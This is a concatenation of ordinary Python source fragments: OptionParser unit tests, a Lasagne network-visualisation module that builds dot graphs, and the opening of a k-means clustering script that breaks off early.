    options.define('a', default=1)
    options.define('b', default=2)
    return options
def test_iter(self):
    """Iterating a parser yields its option names."""
    # OptionParsers always define 'help'.
    self.assertEqual({'a', 'b', 'help'}, set(iter(self._sample_options())))
def test_getitem(self):
    """Option values are reachable via dict-style indexing."""
    self.assertEqual(1, self._sample_options()['a'])
def test_items(self):
    """items() yields (name, value) pairs, including the built-in 'help'."""
    options = self._sample_options()
    wanted = [('a', 1), ('b', 2), ('help', options.help)]
    self.assertEqual(wanted, sorted(options.items()))
def test_as_dict(self):
    """as_dict() maps every option name (including 'help') to its value."""
    options = self._sample_options()
    self.assertEqual({'a': 1, 'b': 2, 'help': options.help}, options.as_dict())
def test_group_dict(self):
    """Options can be grouped; ungrouped ones land in a file-named group."""
    options = OptionParser()
    options.define('a', default=1)
    options.define('b', group='b_group', default=2)
    # Ungrouped options are filed under the name of the defining source file.
    frame = sys._getframe(0)
    this_file = frame.f_code.co_filename
    self.assertEqual(set(['b_group', '', this_file]), options.groups())
    b_group_dict = options.group_dict('b_group')
    self.assertEqual({'b': 2}, b_group_dict)
    self.assertEqual({}, options.group_dict('nonexistent'))
    @unittest.skipIf(mock is None, 'mock package not present')
    def test_mock_patch(self):
        # ensure that our setattr hooks don't interfere with mock.patch
        options = OptionParser()
        options.define('foo', default=1)
        options.parse_command_line(['main.py', '--foo=2'])
        self.assertEqual(options.foo, 2)
        # A single patch applies inside the context and is undone on exit.
        with mock.patch.object(options.mockable(), 'foo', 3):
            self.assertEqual(options.foo, 3)
        self.assertEqual(options.foo, 2)
        # Try nested patches mixed with explicit sets
        with mock.patch.object(options.mockable(), 'foo', 4):
            self.assertEqual(options.foo, 4)
            # An explicit assignment made under a patch is visible while
            # that patch is active...
            options.foo = 5
            self.assertEqual(options.foo, 5)
            # ...survives an inner patch being applied and unwound...
            with mock.patch.object(options.mockable(), 'foo', 6):
                self.assertEqual(options.foo, 6)
            self.assertEqual(options.foo, 5)
        # ...and is reverted together with the outer patch.
        self.assertEqual(options.foo, 2)
def test_types(self):
options = OptionParser()
options.define('str', type=str)
options.define('basestring', type=basestring_type)
options.define('int', type=int)
options.define('float', type=float)
options.define('datetime', type=datetime.datetime)
options.define('timedelta', type=datetime.timedelta)
options.parse_command_line(['main.py',
'--str=asdf',
'--basestring=qwer',
'--int=42',
'--float=1.5',
'--datetime=2013-04-28 05:16',
'--timedelta=45s'])
self.assertEqual(options.str, 'asdf')
self.assertEqual(options.basestring, 'qwer')
self.assertEqual(options.int, 42)
self.assertEqual(options.float, 1.5)
self.assertEqual(options.datetime,
datetime.datetime(2013, 4, 28, 5, 16))
self.assertEqual(options.timedelta, datetime.timedelta(seconds=45))
def test_multiple_string(self):
options = OptionParser()
options.define('foo', type=str, multiple=True)
options.parse_command_line(['main.py', '--foo=a,b,c'])
self.assertEqual(options.foo, ['a', 'b', 'c'])
def test_multiple_int(self):
options = OptionParser()
options.define('foo', type=int, multiple=True)
options.parse_command_line(['main.py', '--foo=1,3,5:7'])
self.assertEqual(options.foo, [1, 3, 5, 6, 7])
def test_error_redefine(self):
options = OptionParser()
options.define('foo')
with self.assertRaises(Error) as cm:
options.define('foo')
self.assertRegexpMatches(str(cm.exception),
'Option.*foo.*already defined')
| |
"""Visualize a neural network as a (dot) graph.
This module provides functions and classes to generate dot graphs for a
given lasagne model or a list of layers. It provides e.g. the ability to
"draw" a model "to_notebook", pretty much exactly like `nolearn
<https://github.com/dnouri/nolearn>`_ via:
>>> from utils.visualize import draw_to_notebook, nolearn
>>> model = ...
>>> draw_to_notebook(model, nolearn)
The module allows more customization for the drawing of notebooks.
The functions ``draw_to_file`` and ``draw_to_notebook`` take the keyword
argument ``node_creator``, which controls how each layer's node is created.
The module provides the following creation functions:
``nolearn`` draws as nolearn's implementation would and takes the
same arguments.
``verbose_create`` creates a graph with a lot of information.
``format_create`` allows type specific node creation by using string
formatting. The color of the node and a format string that is
used to create the label are passed on as two dictionaries.
``default_create`` is the default creator and executes
``format_create`` with either a short format map or
a more verbose one
The module also provides ways to create and pass type specific color maps
for the layers (with static colors). The function ``colors_from_cmap``
creates such a dictionary for the colors from a (matplotlib) colormap.
The ``ParamFormatter`` that is used by default also provides some
useful format specifiers for a :class:`Layer`'s attributes.
"""
from string import Formatter
from lasagne.layers import Layer, conv, get_all_layers, pool, recurrent
from lasagne.layers.conv import Conv1DLayer, Conv2DLayer, Conv3DLayer,\
Deconv2DLayer, DilatedConv2DLayer, TransposedConv2DLayer,\
TransposedConv3DLayer
from lasagne.layers.dense import DenseLayer, NINLayer
from lasagne.layers.embedding import EmbeddingLayer
from lasagne.layers.input import InputLayer
from lasagne.layers.local import LocallyConnected2DLayer
from lasagne.layers.merge import ConcatLayer, ElemwiseMergeLayer,\
ElemwiseSumLayer
from lasagne.layers.noise import DropoutLayer, GaussianNoiseLayer
from lasagne.layers.normalization import BatchNormLayer,\
LocalResponseNormalization2DLayer
from lasagne.layers.pool import FeaturePoolLayer, FeatureWTALayer,\
GlobalPoolLayer, MaxPool1DLayer, MaxPool2DLayer, MaxPool3DLayer,\
Pool1DLayer, Pool2DLayer, Pool3DLayer, SpatialPyramidPoolingLayer,\
Upscale1DLayer, Upscale2DLayer, Upscale3DLayer
from lasagne.layers.recurrent import CustomRecurrentLayer, GRULayer, Gate,\
LSTMLayer, RecurrentLayer
from lasagne.layers.shape import DimshuffleLayer, FlattenLayer, PadLayer,\
ReshapeLayer, SliceLayer
from lasagne.layers.special import BiasLayer, ExpressionLayer, InverseLayer,\
NonlinearityLayer, ParametricRectifierLayer, RandomizedRectifierLayer,\
ScaleLayer, TPSTransformerLayer, TransformerLayer
from matplotlib.cm import get_cmap
from matplotlib.colors import rgb2hex
from pydotplus import Dot, Edge, Node
# Public API of this module.
__all__ = ('draw_to_file', 'draw_to_notebook', 'pydot_graph', 'nolearn',
           'SHORT', 'VERBOSE', 'default_create', 'format_create',
           'ParamFormatter', 'verbose_create', 'DEFAULT_MAP',
           'colors_from_cmap', 'dot_escape')
# draw like nolearn does it
# Twenty hex colors in four groups of five shades; _nolearn_color slices
# them as blues (conv), oranges (pool), purples (recurrent), greens (rest).
NOLEARN_COLORS = ('#4A88B3', '#98C1DE', '#6CA2C8', '#3173A2', '#17649B',
                  '#FFBB60', '#FFDAA9', '#FFC981', '#FCAC41', '#F29416',
                  '#C54AAA', '#E698D4', '#D56CBE', '#B72F99', '#B0108D',
                  '#75DF54', '#B3F1A0', '#91E875', '#5DD637', '#3FCD12')
def _nolearn_color(layer):
    """Return a color for the given layer, like nolearn would.

    The color family is chosen by layer category (convolution, pooling,
    recurrent, other) and the shade by a digest of the class name.
    """
    cls_name = type(layer).__name__
    # Use a deterministic digest instead of the built-in hash(): string
    # hashing is randomized per process (PYTHONHASHSEED), which would give
    # the same model different shades on every run of the program.
    hashed = sum(ord(char) for char in cls_name) % 5
    if cls_name in conv.__all__:
        return NOLEARN_COLORS[:5][hashed]
    elif cls_name in pool.__all__:
        return NOLEARN_COLORS[5:10][hashed]
    elif cls_name in recurrent.__all__:
        return NOLEARN_COLORS[10:15][hashed]
    return NOLEARN_COLORS[15:20][hashed]
def nolearn(layer, output_shape=True, verbose=False, **kwargs):
    """Create a :class:`Node` for a given layer, like nolearn would.

    Parameters
    ----------
    layer : a :class:`Layer` instance
        The layer for which a node shall be created.
    output_shape : boolean (``True``)
        If ``True`` the output shape of the layer will be displayed.
    verbose : boolean (``False``)
        If ``True`` layer attributes like filter shape, stride, etc.
        will be displayed.
    kwargs : keyword arguments
        Those will be passed down to :class:`Node`.
    """
    parts = [type(layer).__name__]
    if verbose:
        attrs = ('num_filters', 'num_units', 'ds', 'filter_shape',
                 'stride', 'strides', 'p')
        parts.extend(f'{name}: {getattr(layer, name)}'
                     for name in attrs if hasattr(layer, name))
        if hasattr(layer, 'nonlinearity'):
            nonlinearity = layer.nonlinearity
            # Functions carry __name__; callable objects fall back to
            # their class name.
            func_name = getattr(nonlinearity, '__name__',
                                type(nonlinearity).__name__)
            parts.append(f'nonlinearity: {func_name}')
    if output_shape:
        parts.append(f'Output shape: {layer.output_shape}')
    return Node(repr(layer), label='\n'.join(parts), shape='record',
                fillcolor=_nolearn_color(layer), style='filled', **kwargs)
# get colors from a colormap
def _types_from_lasange():
    """Retrieve a list of all layer types from lasagne."""
    from lasagne.layers import input, base, dense, noise, local, shape, \
        merge, normalization, special
    modules = (input, base, conv, dense, recurrent, pool, shape, merge,
               normalization, noise, local, special)
    collected = []
    for module in modules:
        for name in module.__all__:
            candidate = getattr(module, name)
            # Keep only Layer subclasses, preserving first-seen order and
            # skipping names re-exported by several modules.
            if candidate in collected:
                continue
            if isinstance(candidate, type) and issubclass(candidate, Layer):
                collected.append(candidate)
    return collected
def colors_from_cmap(types=None, color_map='terrain'):
    """Create a color dict from a color map.

    Parameters
    ----------
    types : list of :class:`Layer` subclasses or ``None`` (``None``)
        The color dict will be created for this list of layer types; if
        ``None`` a list of all layer types is retrieved from lasagne.
    color_map : string or colormap (``'terrain'``)
        The colormap to use.

    Returns
    -------
    A dictionary mapping each layer type to a hex color string.
    """
    types = types or _types_from_lasange()
    # Sample ~10% more colors than types so the last entries do not all
    # collapse onto the colormap's end color.  The lut argument of
    # ``get_cmap`` must be an int; ``2 + len(types) * 1.1`` is a float.
    cmap = get_cmap(color_map, int(2 + len(types) * 1.1))
    return {t: rgb2hex(cmap(i)[:3]) for i, t in enumerate(types)}
# Module-wide default type -> color mapping, built once at import time.
DEFAULT_MAP = colors_from_cmap()
def dot_escape(obj):
    """Return ``str(obj)`` with all dot-special characters escaped.

    Each of the characters ``<>(){}-[]`` is prefixed with a backslash so
    the result can safely be embedded in a dot label.
    """
    specials = '<>(){}-[]'
    return ''.join('\\' + char if char in specials else char
                   for char in str(obj))
def verbose_create(layer, color_map=DEFAULT_MAP,
                   blacklist=('input_layer', 'input_layers'), **kwargs):
    """Create a node for the layer with a lot of information.

    The node's label lists every instance attribute of the layer (except
    the ones in ``blacklist``), one per line, dot-escaped.

    Parameters
    ----------
    layer : a :class:`Layer` instance
        The layer.
    color_map : dictionary
        A dictionary that maps all layer types to a color value.
    blacklist : sequence of strings
        A list of attribute names that are not included.
    kwargs : keyword arguments
        Those will be passed down to :class:`Node`.
    """
    label = type(layer).__name__
    # A KeyError here means the layer's type is missing from color_map.
    color = color_map[type(layer)]
    variables = vars(layer)
    label += '\n' + '\n'.join((f'{n} : {dot_escape(variables[n])}'
                               for n in sorted(variables)
                               if n not in blacklist))
    return Node(repr(layer), label=label, shape='record',
                fillcolor=color, style='filled', **kwargs)
# create nodes via a class specific string format system
# Format map with an empty label for every known layer type; serves as a
# template (and fallback) so ``format_create`` finds an entry per type.
EMPTY = {
    # input
    InputLayer: '',
    # dense
    DenseLayer: '',
    NINLayer: '',
    # convolution
    Conv1DLayer: '',
    Conv2DLayer: '',
    Conv3DLayer: '',
    TransposedConv2DLayer: '',
    TransposedConv3DLayer: '',
    Deconv2DLayer: '',
    DilatedConv2DLayer: '',
    # local
    LocallyConnected2DLayer: '',
    # pooling
    Pool1DLayer: '',
    Pool2DLayer: '',
    Pool3DLayer: '',
    MaxPool1DLayer: '',
    MaxPool2DLayer: '',
    MaxPool3DLayer: '',
    Upscale1DLayer: '',
    Upscale2DLayer: '',
    Upscale3DLayer: '',
    GlobalPoolLayer: '',
    FeaturePoolLayer: '',
    FeatureWTALayer: '',
    SpatialPyramidPoolingLayer: '',
    # recurrent
    CustomRecurrentLayer: '',
    RecurrentLayer: '',
    LSTMLayer: '',
    GRULayer: '',
    Gate: '',
    # noise
    DropoutLayer: '',
    GaussianNoiseLayer: '',
    # shape
    ReshapeLayer: '',
    FlattenLayer: '',
    DimshuffleLayer: '',
    PadLayer: '',
    SliceLayer: '',
    # merge
    ConcatLayer: '',
    ElemwiseMergeLayer: '',
    ElemwiseSumLayer: '',
    # normalization
    BatchNormLayer: '',
    LocalResponseNormalization2DLayer: '',
    # embedding
    EmbeddingLayer: '',
    # special
    NonlinearityLayer: '',
    BiasLayer: '',
    ScaleLayer: '',
    ExpressionLayer: '',
    InverseLayer: '',
    TransformerLayer: '',
    TPSTransformerLayer: '',
    ParametricRectifierLayer: '',
    RandomizedRectifierLayer: '',
}
# Verbose per-type label format strings: each label lists the layer's
# salient hyper-parameters and its output shape.  The custom format specs
# (``:param``, ``:func``, ``:shape``, ``:list``, ``:value``) are handled
# by ``ParamFormatter``.  Label typos fixed: "dimentions" -> "dimensions",
# "spacial" -> "spatial", stray trailing commas after "de-convolution".
VERBOSE = {
    # input
    InputLayer: 'input: {output_shape}',
    # dense
    DenseLayer: '''fully connected
    W: {W:param}
    bias: {b:param}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    NINLayer: '''network in network
    units: {num_units}
    W: {W:param}
    bias: {b:param}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}
    ''',
    # convolution
    Conv1DLayer: '''convolution
    filters: {num_filters}
    filter size: {filter_size}
    convolution: {convolution:func}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    padding: {pad}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    Conv2DLayer: '''convolution
    filters: {num_filters}
    filter size: {filter_size:shape}
    convolution: {convolution:func}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    padding: {pad}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    Conv3DLayer: '''convolution
    filters: {num_filters}
    filter size: {filter_size}
    convolution: {convolution:func}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    padding: {pad}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    TransposedConv2DLayer: '''de-convolution
    filters: {num_filters}
    filter size: {filter_size}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    cropping: {crop}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    TransposedConv3DLayer: '''de-convolution
    filters: {num_filters}
    filter size: {filter_size}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    cropping: {crop}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    Deconv2DLayer: '''de-convolution
    filters: {num_filters}
    filter size: {filter_size}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    cropping: {crop}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    DilatedConv2DLayer: '''dilated conv.
    filters: {num_filters}
    filter size: {filter_size}
    dilation: {dilation}
    weights: {W:param}
    bias: {b:param}
    padding: {pad}
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    LocallyConnected2DLayer: '''
    filters: {num_filters}
    filter size: {filter_size}
    weights: {W:param}
    bias: {b:param}
    stride: {stride:shape}
    padding: {pad}
    nonlinearity: {nonlinearity:func}
    channel wise : {channelwise}
    output: {output_shape}''',
    # pooling
    Pool1DLayer: '''pooling
    pool size: {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    mode: {mode}
    output: {output_shape}''',
    Pool2DLayer: '''pooling
    pool size : {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    mode: {mode}
    output: {output_shape}''',
    Pool3DLayer: '''pooling
    pool size: {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    mode: {mode}
    output: {output_shape}''',
    MaxPool1DLayer: '''max-pooling
    pool size: {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    output: {output_shape}''',
    MaxPool2DLayer: '''max-pooling
    pool size: {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    output: {output_shape}''',
    MaxPool3DLayer: '''max-pooling
    pool size: {pool_size:shape}
    stride: {stride:shape}
    pad: {pad:list}
    output: {output_shape}''',
    Upscale1DLayer: '''upscale
    scale factor: {scale_factor:list}
    output: {output_shape}''',
    Upscale2DLayer: '''upscale
    scale factor: {scale_factor:list}
    output: {output_shape}''',
    Upscale3DLayer: '''upscale
    scale factor: {scale_factor:list}
    output: {output_shape}''',
    GlobalPoolLayer: '''global pooling
    function: {pool_function:func}
    output: {output_shape}''',
    FeaturePoolLayer: '''feature pooling
    function: {pool_function:func}
    pool size: {pool_size:shape}
    axis: {axis}
    output: {output_shape}''',
    FeatureWTALayer: '''WTA feat. pool.
    pool size: {pool_size:shape}
    axis: {axis}
    output: {output_shape}''',
    SpatialPyramidPoolingLayer: '''pyramid pooling
    pool. dimensions: {pool_dims}
    mode: {mode}
    implementation: {implementation}
    output: {output_shape}''',
    # recurrent
    CustomRecurrentLayer: '',
    RecurrentLayer: '',
    LSTMLayer: '',
    GRULayer: '',
    Gate: '',
    # noise
    DropoutLayer: '''dropout
    dropout prob.: {p:0.3%}
    rescale outputs: {rescale}
    shared axes: {shared_axes}''',
    GaussianNoiseLayer: '''gauss. noise
    std. deviation: {sigma}''',
    # shape
    ReshapeLayer: '''reshape
    output: {output_shape}''',
    FlattenLayer: '''flatten
    output dims.: {outdim}
    output: {output_shape}''',
    DimshuffleLayer: '''dim-shuffle
    pattern: {pattern}
    output: {output_shape}''',
    PadLayer: '''padding
    value: {val}
    width: {width:list}
    since dim: {batch_ndim}
    output: {output_shape}''',
    SliceLayer: '''slicing
    indices: {indices}
    axis: {axis}
    output: {output_shape}''',
    # merge
    ConcatLayer: '''concatenation
    axis: {axis}
    cropping: {cropping:list}
    output: {output_shape}''',
    ElemwiseMergeLayer: '''elem-wise merge
    function: {merge_function:func}
    cropping: {cropping:list}
    output: {output_shape}''',
    ElemwiseSumLayer: '''elem-wise sum
    coefficients: {coeffs:list}
    cropping: {cropping:list}
    output: {output_shape}''',
    # normalization
    LocalResponseNormalization2DLayer: '''LRN
    alpha: {alpha:value}
    k: {k:value}
    beta: {beta:value}
    n: {n}''',
    BatchNormLayer: '''batch normalization
    alpha: {alpha:value}
    beta: {beta:param}
    epsilon: {epsilon:value}
    gamma: {gamma:param}
    axes: {axes:list}''',
    # embedding
    EmbeddingLayer: '''embedding
    input size: {input_size}
    output size: {output_size}
    output: {output_shape}''',
    # special
    NonlinearityLayer: 'nonlinearity: {nonlinearity:func}',
    BiasLayer: '''bias
    bias: {b:param}
    shared axes: {shared_axes:list}''',
    ScaleLayer: '''scaling
    scales: {scales:param}
    shared axes: {shared_axes:list}''',
    ExpressionLayer: '''expression
    function: {function:func}
    output: {output_shape}''',
    InverseLayer: '''inverse
    layer: {layer}
    output: {output_shape}''',
    TransformerLayer: '''
    network: {localization_network}
    downsample factor: {downsample_factor:list}
    border mode: {border_mode}
    output: {output_shape}''',
    TPSTransformerLayer: '''spatial trans.
    network: {localization_network}
    downsample factor: {downsample_factor:list}
    control points: {control_points}
    precompute grid: {precompute_grid}
    border mode: {border_mode}
    output: {output_shape}''',
    ParametricRectifierLayer: '''PReLU
    alpha: {alpha:value}
    shared axes: {shared_axes}''',
    RandomizedRectifierLayer: '''RReLU
    lower bound: {lower:value}
    upper bound: {upper:value}
    shared axes: {shared_axes}''',
}
# Compact per-type label format strings, used by ``default_create`` when
# ``verbose`` is off.  Custom specs are handled by ``ParamFormatter``.
SHORT = {
    # input
    InputLayer: 'input: {output_shape}',
    # dense
    DenseLayer: '''fully connected
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    NINLayer: '''NiN
    nonlinearity: {nonlinearity:func}
    output: {output_shape}''',
    # convolution
    Conv1DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Conv2DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Conv3DLayer: '''conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    TransposedConv2DLayer:
        '''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    TransposedConv3DLayer:
        '''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Deconv2DLayer:
        '''de-conv. {num_filters}, {filter_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    DilatedConv2DLayer: '',
    # local
    LocallyConnected2DLayer: '',
    # pooling
    Pool1DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Pool2DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Pool3DLayer: '''pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    MaxPool1DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    MaxPool2DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    MaxPool3DLayer: '''max-pool. {pool_size:shape} \\\\{stride:shape}
    output: {output_shape}''',
    Upscale1DLayer: '''upscale {scale_factor:list}
    output: {output_shape}''',
    Upscale2DLayer: '''upscale {scale_factor:list}
    output: {output_shape}''',
    Upscale3DLayer: '''upscale {scale_factor:list}
    output: {output_shape}''',
    GlobalPoolLayer: '''global pooling: {pool_function:func}
    output: {output_shape}''',
    FeaturePoolLayer: '',
    FeatureWTALayer: '',
    SpatialPyramidPoolingLayer: '',
    # recurrent
    CustomRecurrentLayer: '',
    RecurrentLayer: '',
    LSTMLayer: '',
    GRULayer: '',
    Gate: '',
    # noise
    DropoutLayer: 'dropout, {p:0.2%}',
    # BUG FIX: the sigma placeholder was written as ``(sigma:value)`` and
    # rendered literally; a ``{...}`` format field is required.
    GaussianNoiseLayer: 'noise ({sigma:value})',
    # shape
    ReshapeLayer: 'reshape\noutput: {output_shape}',
    FlattenLayer: 'flatten\noutput: {output_shape}',
    DimshuffleLayer: 'dim-shuffle ({pattern})\noutput: {output_shape}',
    PadLayer: '''padding ({val} \\{width})
    output: {output_shape}''',
    SliceLayer: '',
    # merge
    ConcatLayer: 'concatenation\noutput: {output_shape}',
    ElemwiseMergeLayer: 'merge, {merge_function:func}',
    ElemwiseSumLayer: '+',
    # normalization
    BatchNormLayer: 'BN',
    LocalResponseNormalization2DLayer: '',
    # embedding
    EmbeddingLayer: '',
    # special
    NonlinearityLayer: '{nonlinearity:func}',
    BiasLayer: 'bias',
    ScaleLayer: 'scaling',
    ExpressionLayer: 'expression\noutput: {output_shape}',
    InverseLayer: '',
    TransformerLayer: '',
    TPSTransformerLayer: '',
    ParametricRectifierLayer: 'PReLU',
    RandomizedRectifierLayer: 'RReLU',
}
class ParamFormatter(Formatter):
    """A special :class:`Formatter` for the layer attributes.

    The formatter will (somewhat) nicely format the input and output
    shapes and also offers special format specs for formatting the
    parameters of a layer.

    The format specs are:

    - ``'shape'``: to format a shape like ``'32x32'``
    - ``'func'``: to show the name of a function.
    - ``'param'``: will show the shape of the parameter in a list.
    - ``'list'``: will show the parameter as a list.
    - ``'value'``: to display the value of a parameter.
    """

    # Keyword names that are rendered through ``activation_shape``.
    shapes = ('output_shape', 'input_shape')

    @staticmethod
    def activation_shape(shape):
        """Format an input or output shape (the batch axis is dropped)."""
        if len(shape) == 2:
            return f'{shape[1]} units'
        elif len(shape) == 3:
            # 1D convolution/pooling outputs: (batch, channels, length).
            # Previously unhandled, which made the verbose/short format
            # maps fail for e.g. Conv1DLayer with a ValueError.
            return '{} ch, {}'.format(*shape[1:])
        elif len(shape) == 4:
            return '{} ch, {} x {}'.format(*shape[1:])
        elif len(shape) == 5:
            return '{} ch, {} x {} x {}'.format(*shape[1:])
        else:
            raise ValueError(f'Can not handle shape "{shape}".')

    @staticmethod
    def param_shape(shape):
        """Format a parameter shape (or any sequence) as ``[a, b, ...]``."""
        if shape is None:
            return 'none'
        if len(shape) == 1:
            return f'[{shape[0]}, ]'
        return '[{}]'.format(', '.join(str(i) for i in shape))

    def get_value(self, key, args, kwargs):
        """Resolve a field name; shape-like keys get pretty-printed."""
        if not isinstance(key, str):
            return super(ParamFormatter, self).get_value(key, args, kwargs)
        if key in self.shapes:
            return self.activation_shape(kwargs[key])
        return super(ParamFormatter, self).get_value(key, args, kwargs)

    def format_field(self, value, format_spec):
        """Apply the custom format specs; defer to Formatter otherwise."""
        if format_spec == 'shape':
            return 'x'.join(str(i) for i in value)
        elif format_spec == 'func':
            try:
                return value.__name__
            except AttributeError:
                return value.__class__.__name__
        elif format_spec == 'param':
            if value is None:
                return 'none'
            # Shared variables expose their shape through .eval() —
            # assumes a theano-style parameter; TODO confirm.
            shape = value.shape.eval()
            return self.param_shape(shape)
        elif format_spec == 'list':
            return self.param_shape(value)
        elif format_spec == 'value':
            try:
                value = value.eval()
            except AttributeError:
                pass
            return str(value)
        return super(ParamFormatter, self).format_field(value, format_spec)
def format_create(layer, format_map, color_map=DEFAULT_MAP,
                  formatter=None, **kwargs):
    """Create a :class:`Node` from a formatting system.

    Parameters
    ----------
    layer : a :class:`Layer` instance
        The layer.
    format_map : a dictionary mapping layer types to format strings
        A dictionary that contains a format string for each of the
        layer's types. The information for the node is created by using
        ``formatter`` to call format with all the layer attributes as
        (keyword) arguments.
    color_map : a dictionary mapping layer types to strings
        The dictionary should contain all the colors for all the used
        layer types.
    formatter : :class:`Formatter` instance or ``None`` (``None``)
        The formatter for creating the node information.  If ``None`` a
        fresh :class:`ParamFormatter` is used; the previous shared
        default instance was the mutable-default-argument pitfall.
    kwargs : keyword arguments
        Those will be passed down to :class:`Node`.
    """
    if formatter is None:
        formatter = ParamFormatter()
    color = color_map[type(layer)]
    # Expose every attribute of the layer to the format string.
    variables = {n: getattr(layer, n) for n in dir(layer)}
    label = formatter.format(format_map[type(layer)], **variables)
    return Node(repr(layer), label=label, shape='record',
                fillcolor=color, style='filled', **kwargs)
def default_create(layer, verbose=False, **kwargs):
    """Default creation function for nodes.

    Parameters
    ----------
    layer : a :class:`Layer` instance
        The layer.
    verbose : boolean (``False``)
        Show extra information if ``True``.
    kwargs : keyword arguments
        Those will be passed to ``format_create`` and :class:`Node`.
    """
    # Pick the detailed or the compact format map and delegate.
    return format_create(layer, VERBOSE if verbose else SHORT, **kwargs)
# creating and drawing graphs
def draw_to_file(layer_or_layers, filename, node_creator=default_create,
                 **kwargs):
    """Draws a network diagram to a file.

    The output format is derived from the file extension (e.g. ``.png``).

    Parameters
    ----------
    layer_or_layers : one :class:`Layer` instance or a list of layers
        Either a list of layers or the model in form of the last layer.
    filename : string
        The filename to save the output to; must carry an extension.
    node_creator : callable
        A function that creates a :class:`Node` for a given layer.
    kwargs : keyword arguments
        Those will be passed to ``pydot_graph``, ``node_creator`` and
        later to :class:`Node`.

    Raises
    ------
    ValueError
        If no output format can be derived from ``filename``.
    """
    if isinstance(layer_or_layers, Layer):
        layers = get_all_layers(layer_or_layers)
    else:
        layers = layer_or_layers
    dot = pydot_graph(layers, node_creator=node_creator, **kwargs)
    # Previously a filename without a dot raised a bare IndexError from
    # rsplit; fail with a clear message instead.
    stem, _, ext = filename.rpartition('.')
    if not stem:
        raise ValueError(
            f'Cannot derive an output format from filename "{filename}".')
    with open(filename, 'wb') as fid:
        fid.write(dot.create(format=ext))
def draw_to_notebook(layer_or_layers, node_creator=default_create, **kwargs):
    """Draws a network diagram in an IPython notebook.

    Parameters
    ----------
    layer_or_layers : one :class:`Layer` instance or a list of layers
        Either a list of layers or the model in form of the last layer.
    node_creator : callable
        A function that creates a :class:`Node` for a given layer.
    kwargs : keyword arguments
        Those will be passed to ``pydot_graph``, ``node_creator`` and
        later to :class:`Node`.
    """
    # Imported lazily so the module works outside IPython as well.
    from IPython.display import Image
    layers = (get_all_layers(layer_or_layers)
              if isinstance(layer_or_layers, Layer) else layer_or_layers)
    graph = pydot_graph(layers, node_creator=node_creator, **kwargs)
    return Image(graph.create_png())
def pydot_graph(layers, node_creator=default_create, **kwargs):
    """Create a :class:`Dot` graph for a list of layers.

    Parameters
    ----------
    layers : list of :class:`Layer` instances
        The graph will be created with the layers from that list.
    node_creator : callable (``default_create``)
        A function that creates a :class:`Node` for a given layer.
    kwargs : keyword arguments
        Those will be passed down to ``node_creator`` or :class:`Node`.
    """
    nodes = {layer: node_creator(layer, **kwargs) for layer in layers}
    edges = []
    for layer in layers:
        # Merge layers list their inputs in ``input_layers``; single-input
        # layers carry ``input_layer``.
        if hasattr(layer, 'input_layers'):
            edges.extend((source, layer) for source in layer.input_layers)
        if hasattr(layer, 'input_layer'):
            edges.append((layer.input_layer, layer))
    graph = Dot('Network', graph_type='digraph')
    for node in nodes.values():
        graph.add_node(node)
    for start, end in edges:
        # Skip edges whose source was not part of ``layers``.
        if start in nodes and end in nodes:
            graph.add_edge(Edge(nodes[start], nodes[end]))
    return graph
| |
"""README, Author - Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- sklearn
- numpy
- matplotlib
Python:
- 3.5
Inputs:
- X , a 2D numpy array of features.
- k , number of clusters to create.
- initial_centroids , initial centroid values generated by utility function(mentioned
in usage).
- maxiter , maximum number of iterations to process.
- heterogeneity , empty list that will be filled with heterogeneity values if passed
to kmeans func.
Usage:
1. define 'k' value, 'X' features array and 'heterogeneity' empty list
2. create initial_centroids,
initial_centroids = get_initial_centroids(
X,
k,
seed=0 # seed value for initial centroid generation,
# None for randomness(default=None)
)
3. find centroids and clusters using kmeans function.
centroids, cluster_assignment = kmeans(
X,
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True # whether to print logs in console or not.(default=False)
)
4. Plot the loss function, heterogeneity values for every iteration saved in
heterogeneity list.
plot_heterogeneity(
heterogeneity,
k
)
5. Transfers Dataframe into excel format it must have feature called
'Clust' with k means clustering numbers in it.
"""
import warnings
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.metrics import pairwise_distances
warnings.filterwarnings("ignore")
TAG = "K-MEANS-CLUST/ "
def get_initial_centroids(data, k, seed=None):
    """Randomly choose k distinct data points as initial centroids.

    Parameters
    ----------
    data : 2D array of shape (n_samples, n_features)
    k : number of centroids to draw
